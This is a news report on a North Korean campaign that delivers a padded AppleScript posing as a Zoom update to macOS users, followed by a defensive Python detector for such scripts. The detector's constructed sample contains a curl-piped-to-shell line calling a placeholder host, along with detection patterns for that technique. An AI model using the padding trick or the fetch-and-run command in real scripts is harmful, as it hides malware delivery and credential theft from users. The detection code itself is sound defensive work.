
New Sapphire Sleet attack against macOS users detailed

The Register reports that the North Korean state-backed threat group Sapphire Sleet, also tracked as APT38, has been targeting macOS users with credential- and cryptocurrency-stealing payloads in a new social engineering campaign.

Sapphire Sleet has used fake recruiter profiles on LinkedIn and other social networking sites to deliver a counterfeit Zoom support meeting invitation that lures recipients into downloading a file named "Zoom SDK Update.scpt", according to a Microsoft analysis. The AppleScript is padded with thousands of blank lines so that its malicious commands sit far below anything a casual reader opening the script would see. It first invokes the legitimate macOS softwareupdate binary with an invalid parameter, a decoy that accomplishes nothing, and then uses curl to retrieve and execute another attacker-controlled script, which in turn stages the increasingly complex payloads that follow.
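The padding trick is easy to triage once the AppleScript source is in hand. The following Python is an added example written for this page, not code from Microsoft, SC Media or the Sapphire Sleet campaign: it scans AppleScript source for a long run of blank lines, counts `do shell script` commands, and flags a `softwareupdate` decoy and a curl-to-interpreter pipe. The sample script is constructed to mirror the shape the article describes; its URL and command-line flag are placeholders, and the 200-line padding threshold is an arbitrary assumption.

```python
import re
from dataclasses import dataclass

# Constructed sample in the shape the article describes: an innocuous visible
# first line, thousands of blank lines, then a softwareupdate decoy and a
# curl-to-shell stage. This is NOT the real "Zoom SDK Update.scpt"; the URL
# is a placeholder and the softwareupdate flag is deliberately bogus.
SAMPLE_PADDED_SCRIPT = (
    'display notification "Updating Zoom SDK..." with title "Zoom"\n'
    + "\n" * 3000
    + 'do shell script "softwareupdate --not-a-real-option"\n'
    + 'do shell script "curl -fsSL https://updates.example.invalid/stage2.sh | sh"\n'
)

# curl whose output is piped straight into an interpreter
CURL_PIPE_EXEC = re.compile(
    r'curl\b[^|\n"]*\|\s*(?:sudo\s+)?(?:sh|bash|zsh|osascript|python3?|perl)\b'
)
DO_SHELL_SCRIPT = re.compile(r'\bdo\s+shell\s+script\b', re.IGNORECASE)
SOFTWAREUPDATE = re.compile(r'\bsoftwareupdate\b')


@dataclass
class Verdict:
    total_lines: int
    blank_lines: int
    longest_blank_run: int
    shell_commands: int
    softwareupdate_decoy: bool
    curl_pipe_exec: bool
    suspicious: bool


def analyze_applescript(source: str, min_blank_run: int = 200) -> Verdict:
    """Score AppleScript source for blank-line padding and staged download."""
    lines = source.splitlines()
    blank = 0
    longest = run = 0
    for line in lines:
        if line.strip() == "":
            blank += 1
            run += 1
            longest = max(longest, run)
        else:
            run = 0
    shell_cmds = len(DO_SHELL_SCRIPT.findall(source))
    decoy = bool(SOFTWAREUPDATE.search(source))
    curl = bool(CURL_PIPE_EXEC.search(source))
    # A curl pipe to an interpreter is suspicious on its own; padding is only
    # suspicious when there are shell commands hidden below it.
    padded = longest >= min_blank_run
    suspicious = curl or (padded and shell_cmds > 0)
    return Verdict(len(lines), blank, longest, shell_cmds, decoy, curl, suspicious)


def analyze_file(path: str, min_blank_run: int = 200) -> Verdict:
    """Analyze an AppleScript source file (decompile .scpt first, see note)."""
    with open(path, encoding="utf-8", errors="replace") as f:
        return analyze_applescript(f.read(), min_blank_run)


if __name__ == "__main__":
    print(analyze_applescript(SAMPLE_PADDED_SCRIPT))
```

A compiled .scpt is a binary OSA file rather than text; on macOS, `osadecompile "Zoom SDK Update.scpt"` prints the source, which can then be fed to `analyze_file`. The blank-line check is the cheap signal here, since a script whose commands only appear after hundreds of empty lines has no legitimate reason to look that way.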

Aside from a credential stealer that exfiltrates data via the Telegram Bot API, the campaign also deployed the icloudz backdoor, which enables further in-memory delivery of additional payloads. Microsoft noted that Apple added "platform-level protections" against the campaign after being informed of it.
